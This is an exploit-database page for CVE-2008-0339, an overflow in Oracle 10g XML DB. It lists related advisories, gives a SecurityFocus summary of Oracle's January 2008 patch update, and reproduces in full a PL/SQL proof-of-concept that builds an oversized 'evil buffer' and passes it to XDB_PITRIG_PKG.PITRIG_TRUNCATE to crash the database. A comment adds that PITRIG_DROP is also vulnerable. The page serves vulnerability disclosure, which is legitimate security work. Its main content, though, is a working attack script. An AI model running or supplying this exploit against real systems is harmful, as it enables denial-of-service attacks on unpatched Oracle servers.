Oracle Database 10 g - XML DB xdb.xdb_pitrig_pkg Package PITRIG_TRUNCATE Function Overflow
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Oracle Database Server XDB PITRIG_TRUNCATE Procedure Buffer Overflow (CVE-2008-0339) | 14 Dec 200900:00 | – | checkpoint_advisories | |
| Oracle Database Server XDB PITRIG TRUNCATE and DROP SQL Injection (CVE-2008-0339) | 4 Nov 200900:00 | – | checkpoint_advisories | |
| CVE-2008-0339 | 17 Jan 200822:00 | – | cve | |
| CVE-2008-0339 | 17 Jan 200822:00 | – | cvelist | |
| CVE-2008-0339 | 17 Jan 200823:00 | – | nvd | |
| Oracle Database Server Multiple Unspecified Vulnerabilities (Jan 2008) | 7 Dec 201100:00 | – | openvas | |
| Oracle Database Multiple Vulnerabilities (January 2008 CPU) | 16 Nov 201100:00 | – | nessus | |
| Design/Logic Flaw | 17 Jan 200823:00 | – | prion | |
| Oracle XDB component PITRIG_TRUNCATE buffer overflow | 1 Feb 200800:00 | – | saint | |
| Oracle XDB component PITRIG_TRUNCATE buffer overflow | 1 Feb 200800:00 | – | saint |
10
source: https://www.securityfocus.com/bid/27229/info
Oracle has released its critical patch update for January 2008. The advisory addresses 26 vulnerabilities affecting Oracle Database, Oracle Application Server, Oracle Collaboration Suite, Oracle E-Business Suite, Oracle Enterprise Manager, and Oracle People Soft Enterprise.
The issues identified by the vendor affect all security properties of the Oracle products and present local and remote threats. Various levels of authorization are needed to leverage some of the issues, but other issues do not require any authorization. The most severe of the vulnerabilities could possibly compromise affected computers.
/******************************************************************/
/******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE *********/
/******* BUFFER OVERFLOW *********/
/******************************************************************/
/************ POC exploit , Crash database **************/
/******************************************************************/
/****************** BY Sh2kerr (Digital Security) ***************/
/******************************************************************/
/***************** tested on oracle 10.1.0.2.0 *******************/
/******************************************************************/
/******************************************************************/
/* Date of Public EXPLOIT: January 28, 2008 */
/* Written by: Alexandr "Sh2kerr" Polyakov */
/* email: [email protected] */
/* site: http://www.dsec.ru */
/******************************************************************/
/* Original Advisory by: */
/* Alexandr Polyakov [ [email protected]] */
/* Reported: 18 Dec 2007 */
/* Date of Public Advisory: January 15, 2008 */
/* Advisory: http://www.oracle.com/technology/deploy/ */
/* security/critical-patch-updates/cpujan2008.html */
/* */
/******************************************************************/
/* thanks to oraclefun for his pitrig_dropmetadata exploit */
/* */
/******************************************************************/
set serveroutput on
declare
buff varchar2(32767);
begin
/* generate evil buffer */
buff:='12345678901234567890123456789';
buff:=buff||buff;
buff:=buff||buff;
buff:=buff||buff;
buff:=buff||buff;
buff:=buff||buff;
buff:=buff||'0012345678901234567890123sh2kerr';
/* lets see the buffer size */
dbms_output.put_line('SEND EVIL BUFFER SIZE:'||Length(buff));
xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE(buff,buff);
end;
/
/* P.S. xDb.XDB_PITRIG_PKG.PITRIG_DROP is also vulnerable */
/******************************************************************/
/*************************** SEE U LATER ;) ***********************/
/******************************************************************/Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Jan 2014 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.1453